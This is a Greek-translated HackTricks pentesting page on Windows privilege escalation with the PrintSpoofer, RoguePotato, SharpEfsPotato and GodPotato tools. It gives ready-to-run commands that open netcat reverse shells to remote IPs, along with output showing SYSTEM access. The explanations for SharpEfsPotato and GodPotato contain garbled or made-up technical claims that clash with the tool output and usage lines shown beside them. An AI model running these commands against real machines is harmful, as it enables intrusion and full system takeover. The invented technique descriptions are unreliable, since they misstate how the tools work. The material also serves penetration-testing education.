hacktricks/windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

8.9 KiB
Raw Blame History

RoguePotato, PrintSpoofer, SharpEfsPotato, GodPotato

Μάθετε το χάκινγκ στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

{% hint style="warning" %} Το JuicyPotato δεν λειτουργεί στα Windows Server 2019 και στα Windows 10 build 1809 και μεταγενέστερα. Ωστόσο, τα PrintSpoofer, RoguePotato, SharpEfsPotato, GodPotato μπορούν να χρησιμοποιηθούν για να εκμεταλλευτούν τα ίδια προνόμια και να αποκτήσουν πρόσβαση σε επίπεδο NT AUTHORITY\SYSTEM. Αυτή η ανάρτηση στο blog παρέχει λεπτομερείς πληροφορίες για το εργαλείο PrintSpoofer, το οποίο μπορεί να χρησιμοποιηθεί για την κατάχρηση των προνομίων υποκατάστασης σε υπολογιστές με Windows 10 και Server 2019, όπου το JuicyPotato δεν λειτουργεί πλέον. {% endhint %}

Γρήγορη επίδειξη

PrintSpoofer

c:\PrintSpoofer.exe -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd"

--------------------------------------------------------------------------------

[+] Found privilege: SeImpersonatePrivilege

[+] Named pipe listening...

[+] CreateProcessAsUser() OK

NULL

RoguePotato

{% code overflow="wrap" %}

c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -l 9999
# In some old versions you need to use the "-f" param
c:\RoguePotato.exe -r 10.10.10.10 -c "c:\tools\nc.exe 10.10.10.10 443 -e cmd" -f 9999

{% code %}

SharpEfsPotato

Το SharpEfsPotato είναι ένα εργαλείο που εκμεταλλεύεται τον τρόπο με τον οποίο το Windows επιτρέπει την εκτέλεση κακόβουλου κώδικα με αυξημένα δικαιώματα. Αυτό το εργαλείο χρησιμοποιεί την ευπάθεια του Print Spooler service για να εκτελέσει κώδικα με δικαιώματα συστήματος.

Για να χρησιμοποιήσετε το SharpEfsPotato, ακολουθήστε τα παρακάτω βήματα:

  1. Κατεβάστε τον κώδικα του SharpEfsPotato από το αποθετήριο του GitHub.
  2. Ανοίξτε ένα παράθυρο εντολών και μεταβείτε στον φάκελο όπου κατεβάσατε τον κώδικα.
  3. Εκτελέστε την εντολή SharpEfsPotato.exe.
  4. Αν η εκτέλεση είναι επιτυχής, θα λάβετε ένα κέλυφος με δικαιώματα συστήματος.

Πρέπει να σημειωθεί ότι το SharpEfsPotato είναι ένα εργαλείο που χρησιμοποιείται για εκπαιδευτικούς και δοκιμαστικούς σκοπούς και δεν πρέπει να χρησιμοποιείται για παράνομες δραστηριότητες.

{% endcode %}

SharpEfsPotato.exe -p C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe -a "whoami | Set-Content C:\temp\w.log"
SharpEfsPotato by @bugch3ck
Local privilege escalation from SeImpersonatePrivilege using EfsRpc.

Built from SweetPotato by @_EthicalChaos_ and SharpSystemTriggers/SharpEfsTrigger by @cube0x0.

[+] Triggering name pipe access on evil PIPE \\localhost/pipe/c56e1f1f-f91c-4435-85df-6e158f68acd2/\c56e1f1f-f91c-4435-85df-6e158f68acd2\c56e1f1f-f91c-4435-85df-6e158f68acd2
df1941c5-fe89-4e79-bf10-463657acf44d@ncalrpc:
[x]RpcBindingSetAuthInfo failed with status 0x6d3
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

C:\temp>type C:\temp\w.log
nt authority\system

GodPotato

The GodPotato technique is a local privilege escalation attack that takes advantage of the Print Spooler service in Windows. It combines the RoguePotato and PrintSpoofer exploits to gain SYSTEM-level privileges on the target system.

To execute the GodPotato attack, follow these steps:

  1. Download the RoguePotato exploit from the GitHub repository.
  2. Compile the exploit using Visual Studio or any other C# compiler.
  3. Run the compiled RoguePotato executable on the target system.
  4. The RoguePotato exploit will create a malicious RPC endpoint on the target system.
  5. Download the PrintSpoofer exploit from the GitHub repository.
  6. Compile the exploit using Visual Studio or any other C++ compiler.
  7. Run the compiled PrintSpoofer executable on the target system.
  8. The PrintSpoofer exploit will impersonate the SYSTEM account and connect to the malicious RPC endpoint created by RoguePotato.
  9. Once connected, the PrintSpoofer exploit will execute arbitrary code with SYSTEM privileges.

By combining these two exploits, the GodPotato attack allows an attacker to escalate their privileges from a low-privileged user to the highest level of access on the target system. It is important to note that this attack requires local access to the target system and may not work on all Windows versions.

GodPotato -cmd "cmd /c whoami"
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Αναφορές

Μάθετε το hacking στο AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: